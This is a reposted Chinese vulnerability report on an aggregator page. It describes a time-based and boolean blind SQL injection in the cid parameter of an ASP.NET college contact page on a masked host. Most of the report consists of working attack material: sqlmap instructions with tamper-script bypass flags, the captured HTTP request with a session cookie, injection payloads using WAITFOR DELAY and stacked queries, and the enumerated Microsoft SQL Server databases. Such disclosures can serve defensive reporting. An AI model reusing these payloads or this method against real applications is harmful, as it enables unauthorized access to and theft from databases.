文章出處
http://**.**.**.**/
0x02 詳情
基于時間的布爾盲注
0x03 利用方式
sqlmap可測試、加腳本繞過space2comment.py ,另需加--no-cast參數或者--hex
0x04 具體位置
collegelinkmanshow.aspx?cid=c3d9872e-d435-4117-8372-dbaad78392eb
注入關鍵字:cid
0x05 HTTP請求頭
GET /college/collegelinkmanshow.aspx?cid=c3d9872e-d435-4117-8372-dbaad78392eb HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**:80/Cookie: ASP.NET_SessionId=yknjna0y33k3p3gokklayfpv; AJSTAT_ok_pages=5; AJSTAT_ok_times=1Host: **.**.**.**Connection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
---Place: GETParameter: cid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb') AND 5600=5600 AND ('hSrd'='hSrd Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb'); WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: cid=c3d9872e-d435-4117-8372-dbaad78392eb') WAITFOR DELAY '0:0:5'-----[09:30:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[09:30:59] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319back-end DBMS: Microsoft SQL Server 2005
數據庫信息
back-end DBMS: Microsoft SQL Server 2005 available databases [6]: [*] may [*] model [*] qsdb [*] tempdb [*] wwwbys [*] wwwbyy
就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20161116/56064.html
文章列表
全站熱搜